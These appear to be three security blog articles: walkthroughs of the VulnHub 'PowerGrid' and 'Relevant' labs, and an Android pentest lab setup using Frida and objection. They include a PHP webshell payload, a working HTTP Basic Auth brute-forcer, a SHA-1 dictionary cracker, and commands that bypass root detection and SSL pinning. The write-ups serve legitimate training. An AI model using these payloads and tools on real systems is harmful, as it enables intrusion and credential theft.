PowerGrid: 1.0.1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called "PowerGrid: 1.0.1". It is available at VulnHub for penetration testing practice and you can download it from here.

Credit for creating this lab goes to Thomas Williams. Let's start and learn how to break it down successfully.

Level: Hard

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

Exploiting

  • HTTP Basic Authentication brute force
  • Remote Code Execution (RCE) with a Roundcube exploit
  • Decrypt a PGP message and use the recovered key for SSH

Privilege Escalation

§  Abuse of sudo rsync

§  SSH pivoting

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX



We add the IP address to our "/etc/hosts" file as powergrid.vh and scan all ports with OS detection, version detection, default scripts and traceroute (-A).

$ nmap -A -p- powergrid.vh



Enumeration

The game begins, and so does the pressure: we only have 3 hours to solve the challenge and save the critical infrastructure.

Browsing the web service we see the countdown, but we also learn three usernames: deez1, p48 and all2.



We run dirsearch and find a directory protected with HTTP Basic Authentication.




With that protected directory and three usernames, we brute-force the Basic Authentication with Hydra and the rockyou wordlist.
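Hydra does this in one command, but it helps to see what it is actually doing. The following Python is an added example, not code from the original walkthrough: a minimal HTTP Basic Authentication brute-forcer run against a throwaway local server that guards /protected/. The credentials, the directory name and the four-word wordlist are assumptions standing in for the real ones and for rockyou.

```python
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed target: a local server protecting /protected/ with HTTP Basic
# Authentication. User and password are assumptions for this example only.
VALID_USER = "p48"
VALID_PASS = "secret123"
REALM = "PowerGrid"


class BasicAuthHandler(BaseHTTPRequestHandler):
    """Accepts exactly one user:password pair, answers 401 to everything else."""

    def do_GET(self):
        expected = "Basic " + base64.b64encode(f"{VALID_USER}:{VALID_PASS}".encode()).decode()
        if self.headers.get("Authorization", "") == expected:
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"ok")
        else:
            self.send_response(401)
            self.send_header("WWW-Authenticate", f'Basic realm="{REALM}"')
            self.end_headers()

    def log_message(self, *args):  # keep the example quiet
        pass


def start_server():
    server = HTTPServer(("127.0.0.1", 0), BasicAuthHandler)  # port 0: pick a free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def try_login(url, user, password, timeout=5):
    """One attempt: send Authorization: Basic base64(user:password), True on HTTP 200."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 401:
            return False
        raise


def brute_force(url, users, wordlist):
    """Every user against every password, which is what hydra -L ... -P ... http-get does."""
    for user in users:
        for password in wordlist:
            if try_login(url, user, password):
                return user, password
    return None


def demo():
    server = start_server()
    try:
        url = f"http://127.0.0.1:{server.server_port}/protected/"
        users = ["deez1", "p48", "all2"]                     # the three names from the web page
        wordlist = ["123456", "password", "secret123", "letmein"]  # stand-in for rockyou
        return brute_force(url, users, wordlist)
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(demo())
```

The equivalent Hydra call against the real target (user file and directory name are assumptions) is `hydra -L users.txt -P /usr/share/wordlists/rockyou.txt powergrid.vh http-get /protected/`. Basic Authentication has no lockout by default and every attempt goes to the server log with the source IP, which is why a weak password falls to rockyou and why a defender can spot the attack.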



With the credentials obtained we get in and find a Roundcube webmail.



The same credentials work for the webmail, where there is a single email. It contains a PGP-encrypted message; to read it in plaintext we need the private key and its passphrase. The passphrase is very likely the same password, since this user has already reused it across services.



Exploiting

We note the Roundcube version and look for exploits: this version is vulnerable to Remote Code Execution (RCE).


Exploit: https://www.exploit-db.com/exploits/40892

As always, we review what the exploit does and build a proof of concept: it will create an info.php file on the server.



Legitimate request:



Malicious request:



We request the file and confirm that the site is indeed vulnerable.



Now we create a PHP file that lets us execute arbitrary commands.

Payload (to be URL-encoded): <?php passthru($_GET['cmd']); ?>



We check that our file works:



Perfect! Now we start a netcat listener and run a reverse shell through the webshell (remember to URL-encode every character of the command).


Great! Now we use our two favourite commands to upgrade to an interactive shell.



Going through files and directories recursively, we stumble on the first flag and the first hint.



Following the hint, we switch to user "p48" by reusing the same credentials, and in their home folder under "/home/" we find the GPG private key (the only piece we were still missing to decrypt the message).



For some reason the native "gpg" tool did not work for me, so I used an online tool instead, and the decrypted message turns out to be an SSH private key. (That is acceptable in a lab; on a real engagement keep private keys and passphrases off third-party sites.)



The machine we compromised has no SSH service exposed. Remembering the "pivot" hint, we check the network connections and find a service running inside a Docker container.
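On a minimal box or inside a container, netstat and ss are often missing, but /proc/net/tcp is always there. The following Python is an added example, not part of the original walkthrough: it parses that file's hex-encoded entries and picks out endpoints on Docker's default bridge (172.17.0.0/16) as pivot candidates. The sample table is constructed and its addresses and ports are assumptions.

```python
import os
import struct
from ipaddress import IPv4Address, ip_address, ip_network

# Constructed /proc/net/tcp excerpt (addresses and ports are assumptions):
# row 0: a web server listening on all interfaces,
# row 1: an established connection from the host to 172.17.0.2:22 (a container),
# row 2: the attacker's browser talking to the web server.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 12345 1 0000000000000000 100 0 0 10 0
   1: 010011AC:9C40 020011AC:0016 01 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 20 4 30 10 -1
   2: 0B11A8C0:0050 0511A8C0:D2C4 01 00000000:00000000 00:00000000 00000000    33        0 12347 1 0000000000000000 20 4 30 10 -1
"""

TCP_STATES = {
    0x01: "ESTABLISHED", 0x02: "SYN_SENT", 0x03: "SYN_RECV", 0x04: "FIN_WAIT1",
    0x05: "FIN_WAIT2", 0x06: "TIME_WAIT", 0x07: "CLOSE", 0x08: "CLOSE_WAIT",
    0x09: "LAST_ACK", 0x0A: "LISTEN", 0x0B: "CLOSING",
}
DOCKER_BRIDGE = ip_network("172.17.0.0/16")  # docker0 default; check `ip addr` on the target


def parse_addr(field):
    """'0100007F:0016' -> ('127.0.0.1', 22). The kernel prints the IPv4 address as a
    little-endian 32-bit hex word, so the byte order has to be reversed."""
    ip_hex, port_hex = field.split(":")
    ip = IPv4Address(struct.unpack("<I", bytes.fromhex(ip_hex))[0])
    return str(ip), int(port_hex, 16)


def parse_proc_net_tcp(text):
    sockets = []
    for line in text.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4:
            continue
        sockets.append({
            "local": parse_addr(fields[1]),
            "remote": parse_addr(fields[2]),
            "state": TCP_STATES.get(int(fields[3], 16), fields[3]),
            "uid": int(fields[7]) if len(fields) > 7 else None,
        })
    return sockets


def docker_peers(sockets, bridge=DOCKER_BRIDGE):
    """Endpoints on the docker bridge worth probing: the container side of established
    connections, plus anything listening on a bridge address."""
    peers = set()
    for s in sockets:
        if s["state"] == "ESTABLISHED":
            ip, port = s["remote"]
        elif s["state"] == "LISTEN":
            ip, port = s["local"]
        else:
            continue
        if ip_address(ip) in bridge:
            peers.add((ip, port))
    return sorted(peers)


def main():
    path = "/proc/net/tcp"
    text = open(path).read() if os.path.exists(path) else SAMPLE_PROC_NET_TCP
    socks = parse_proc_net_tcp(text)
    for s in socks:
        print(f"{s['state']:<12} {s['local'][0]}:{s['local'][1]} -> {s['remote'][0]}:{s['remote'][1]}")
    print("docker bridge peers:", docker_peers(socks))


if __name__ == "__main__":
    main()
```

/proc/net/tcp6 has the same layout with 32 hex digits per address; /proc/net/udp likewise. Once a peer such as 172.17.0.2:22 shows up, the recovered SSH key is what gets you into the container.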



We set the private key to mode 600, use it to SSH into the Docker container, and read the 2nd flag and the next hint.



The next hint leads us to run "sudo -l", which shows that the rsync binary can be run as root. We execute the following command to abuse this and escalate privileges to root.

Once root, we go to its home folder and read the 3rd flag and the next hint.



Privilege Escalation (root)

"backwards? pivoting?" Let's repeat the SSH move, but this time we will do it from the compromised docker machine.

Great! We have permissions as root and we can read the last flag.



Author: David Utón is a penetration tester and security auditor for web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contact him on LinkedIn and Twitter.

Android Penetration Testing: Lab Setup

Does setting a password or biometric lock really protect your phone, or does it only keep your data away from a casual attacker? In this article we learn how to set up an environment for mobile application security testing, using Genymotion and Android penetration testing tools.

Table of Content

Install Genymotion

·         Install Virtual Android Device

·         Installation of Gapps

Connect to Android shell using Ubuntu

Android Penetration testing using Frida

·         Install Frida in Ubuntu

·         Install Objection in Ubuntu

Install Frida-Server in Android

 

Install Genymotion

Let's first download Genymotion from here, choosing the build for our system (Windows or Linux). We also need to create a Genymotion account, since the application requires a login.

Run the installer and log in with your Genymotion credentials; if it asks for a licence key, choose personal use.



Since we are using the community edition, I chose the second option.



Install Virtual Android Device

Once Genymotion is installed, create a virtual Android device of any type; its Android API level should be above 23.



Choose NAT as the Network Mode when creating the device.



As you can see, I have installed a Google Nexus 5X with API 26.



Now open VirtualBox and set the network adapter of the Android VM to NAT there as well.



Now start the device from Genymotion; its IP address is shown at the top of the screen.



Installation of Gapps

GApps (Google Apps) is the package of Google applications, including Google Play.

With it we can install any Play Store app; alternatively, dragging and dropping an APK onto the Genymotion device installs it automatically.

To install GApps, click the "Open GApps" button; the installation runs in the background.



After a restart, the Google Play app appears on the Genymotion device.



Connect to Android shell using Ubuntu

For testing we need a shell on the Android device. We connect from Ubuntu, so first install the Android Debug Bridge (adb):

apt install android-tools-adb



Connect to the device over the network (the IP shown on the Genymotion screen) and open a shell:

adb connect 192.168.41.101

adb shell

The Android shell is very similar to a Linux one.



Android Penetration Testing using Frida

Install Frida in Ubuntu

Frida is a powerful open-source dynamic instrumentation toolkit: it attaches to a running process and lets you hook functions, intercept and modify their data, and inject your own scripts.
To install the Frida command-line tools on Ubuntu, run the following (as root, or add --user to install for your account only):

pip3 install frida-tools



Install Objection in Ubuntu

"Objection" is a runtime mobile exploration toolkit, powered by Frida, built to help us assess the security posture of mobile applications without needing a rooted device.

pip3 install objection



Install Frida-Server in Android

Before installing frida-server on the Android device, identify its CPU architecture:

adb shell

getprop | grep abi



Visit https://github.com/frida/frida/releases and download the frida-server archive matching your device's architecture. Since our device is x86, I downloaded the android-x86 build.



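Picking the right frida-server build is the step most often got wrong on multi-ABI devices. The following Python is an added example, not part of the original article: it parses getprop output like the one above, prefers ro.product.cpu.abilist (whose first entry is the primary ABI) over ro.product.cpu.abi, and returns the matching release asset name. The sample property lines and the version number are constructed.

```python
import re

# Constructed output of `adb shell getprop | grep abi` on a Genymotion x86 image
SAMPLE_GETPROP_X86 = """\
[ro.product.cpu.abi]: [x86]
[ro.product.cpu.abilist]: [x86]
[ro.product.cpu.abilist32]: [x86]
[ro.product.cpu.abilist64]: []
"""

# Constructed output for a 64-bit ARM phone that also runs 32-bit code
SAMPLE_GETPROP_ARM64 = """\
[ro.product.cpu.abi]: [arm64-v8a]
[ro.product.cpu.abilist]: [arm64-v8a,armeabi-v7a,armeabi]
"""

# Android ABI -> suffix used in the frida-server release asset names
ABI_TO_FRIDA = {
    "arm64-v8a": "android-arm64",
    "armeabi-v7a": "android-arm",
    "armeabi": "android-arm",
    "x86": "android-x86",
    "x86_64": "android-x86_64",
}

PROP_RE = re.compile(r"\[([^\]]+)\]: \[(.*)\]")


def parse_getprop(text):
    """getprop prints '[name]: [value]' per line; return {name: value}."""
    props = {}
    for line in text.splitlines():
        m = PROP_RE.match(line.strip())
        if m:
            props[m.group(1)] = m.group(2)
    return props


def primary_abi(props):
    """The first abilist entry is the ABI the system prefers; fall back to ro.product.cpu.abi."""
    abilist = [a for a in props.get("ro.product.cpu.abilist", "").split(",") if a]
    return abilist[0] if abilist else props.get("ro.product.cpu.abi")


def frida_server_asset(props, version):
    """Release file to fetch from https://github.com/frida/frida/releases for this device."""
    abi = primary_abi(props)
    if abi not in ABI_TO_FRIDA:
        raise ValueError(f"unsupported ABI {abi!r}")
    return f"frida-server-{version}-{ABI_TO_FRIDA[abi]}.xz"


if __name__ == "__main__":
    for sample in (SAMPLE_GETPROP_X86, SAMPLE_GETPROP_ARM64):
        print(frida_server_asset(parse_getprop(sample), "16.1.4"))
```

A server built for the wrong ABI simply fails to execute on the device, and frida-ps -U then reports that it cannot connect; checking the ABI first saves that round trip.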
After downloading and extracting it, rename the binary to "frida-server" and push it to the /tmp directory of the Android device:

adb push frida-server /tmp



Make frida-server executable on the device (755 is enough; the article uses 777), then start it in the background with ./frida-server & so that the host-side tools can reach it:

adb shell

cd /tmp

chmod 777 frida-server



With Frida you can list the processes running on the device and find the target application.



Here we are testing DIVA, a deliberately vulnerable APK used in Android penetration testing tutorials. We have installed it on the device and will test it with Frida.



Grep for the DIVA process, then explore it with objection, which lets you perform many tasks, among them:

§  Interact with the filesystem, listing entries as well as upload & download files where permitted.

§  Perform various memory-related tasks, such as listing loaded modules and their respective exports.

§  Attempt to bypass and simulate jailbroken or rooted environments.

§  Discover loaded classes and list their respective methods.

§  Perform common SSL pinning bypasses.

§  Dynamically dump arguments from methods called as you use the target application.

§  Interact with SQLite databases inline without the need to download the targeted database and use an external tool.

§  Execute custom Frida scripts

frida-ps -U | grep diva

objection -g jakhar.aseem.diva explore

android root disable

android sslpinning disable

As you can see, we have bypassed root detection and SSL pinning (the last two commands are typed at the objection prompt). SSL pinning is an additional security layer that makes the app trust only a known certificate, to prevent interception and MITM attacks.



Reference: https://github.com/sensepost/objection/wiki/Features

Relevant: 1 Vulnhub Walkthrough

Today we are going to solve another boot2root challenge called "Relevant: 1". It is available at VulnHub for penetration testing practice and you can download it from here.

Credit for creating this lab goes to @iamv1nc3nt. Let's start and learn how to break it down successfully.

Level: Intermediate

Penetration Testing Methodology

Reconnaissance

§  Netdiscover

§  Nmap

Enumeration

§  Dirsearch

§  Nmap with scripts WordPress

Exploiting

  • Wp-file-manager 6.7 Remote Code Execution (RCE)

Privilege Escalation

§  Abuse of credentials with weak hashes in hidden files

§  Abuse of sudo

§  Capture the flag

Walkthrough

Reconnaissance

We are looking for the machine with netdiscover

$ netdiscover -i ethX



We add the IP address to our "/etc/hosts" file and scan all ports with OS detection, version detection, default scripts and traceroute (-A).

$ nmap -A -p- 192.168.10.161



Enumeration

So far everything looks easy: a web service with links to leaked credentials and a QR code to set up two-factor authentication (2FA). Too good to be true!




Listing of credentials in public leaks.



Content of the QR code:



We log in via SSH with the password and the second factor, and get disconnected: the account is not allowed to use this service, so it is a rabbit hole.



Time to launch my favourite directory fuzzer, dirsearch. It shows WordPress files and directories on the machine.



Going back to the clue given by the creator of the machine in the description: "enumerate the box, then enumerate the box differently".

Since our only lead is the remains of a WordPress install, we try the nmap NSE scripts for this CMS (http-wordpress-enum lists plugins and themes).

It lists two plugins, among them "wp-file-manager 6.7".



Exploiting

After that, we look for exploits for this version and find one that allows unauthenticated remote code execution (CVE-2020-25213, the exposed elFinder connector).

Exploit: https://github.com/w4fz5uck5/wp-file-manager-0day

Execute the exploit and access the server.



Since the exploit's output is hard to read, we upload a pentestmonkey PHP reverse shell, start a netcat listener and trigger it.

We execute our two favorite commands to get an interactive shell.



We read "wp-config.php", but something tells me that password is not going to help us much either. xD



We check the files of user "h4x0r" and find a "hidden" folder named with three dots; inside is "note.txt" with credentials whose passwords are SHA-1 hashes we must crack.



We submit the hash to the online service "hashes.com" and get the password in plaintext.
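An online lookup is quick, but it also tells a third party which hashes (and so which targets) you are working on. As an added example, not from the original post, here is the same crack done offline in Python against a note.txt of user:hash lines. The file, users and wordlist are constructed (the hashes are SHA-1 of two words in the wordlist), and the algorithm is inferred from the digest length.

```python
import hashlib

# Constructed note.txt in "user:hash" form (users and hashes are assumptions):
# 7c4a8d09... is sha1("123456"), 5baa61e4... is sha1("password").
NOTE_TXT = """\
news:7c4a8d09ca3762af61e59520943dc26494f8941b
h4x0r:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
"""

# Stand-in for rockyou
WORDLIST = ["letmein", "123456", "qwerty", "password", "relevant"]

# Unsalted digest lengths (hex chars) -> hashlib algorithm name
HASH_BY_LEN = {32: "md5", 40: "sha1", 64: "sha256"}


def parse_note(text):
    """'user:hexhash' per line -> {user: hexhash}; blank or malformed lines are skipped."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        user, h = line.split(":", 1)
        creds[user.strip()] = h.strip().lower()
    return creds


def guess_algorithm(hexhash):
    return HASH_BY_LEN.get(len(hexhash))


def crack(creds, wordlist):
    """Dictionary attack: hash each word once per algorithm in play, then look up every
    target in the table. Returns {user: plaintext} for the hashes that were found."""
    algorithms = {guess_algorithm(h) for h in creds.values()} - {None}
    table = {}
    for word in wordlist:
        for algo in algorithms:
            table[(algo, hashlib.new(algo, word.encode()).hexdigest())] = word
    return {
        user: table[(guess_algorithm(h), h)]
        for user, h in creds.items()
        if (guess_algorithm(h), h) in table
    }


if __name__ == "__main__":
    for user, plaintext in crack(parse_note(NOTE_TXT), WORDLIST).items():
        print(f"{user}: {plaintext}")
```

For anything beyond a handful of hashes, or with the full rockyou list, use hashcat -m 100 (raw SHA-1) or john --format=raw-sha1 instead; the logic is the same, just much faster.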



Privilege Escalation (root)

Now we authenticate as user "news", run "sudo -l" and see that we may execute the binary "node" as root.



We use this to escalate privileges to root with the following syntax.

And finally, we read our well-deserved flag!



Author: David Utón is a penetration tester and security auditor for web applications, perimeter networks, internal and industrial corporate infrastructures, and wireless networks. Contact him on LinkedIn and Twitter.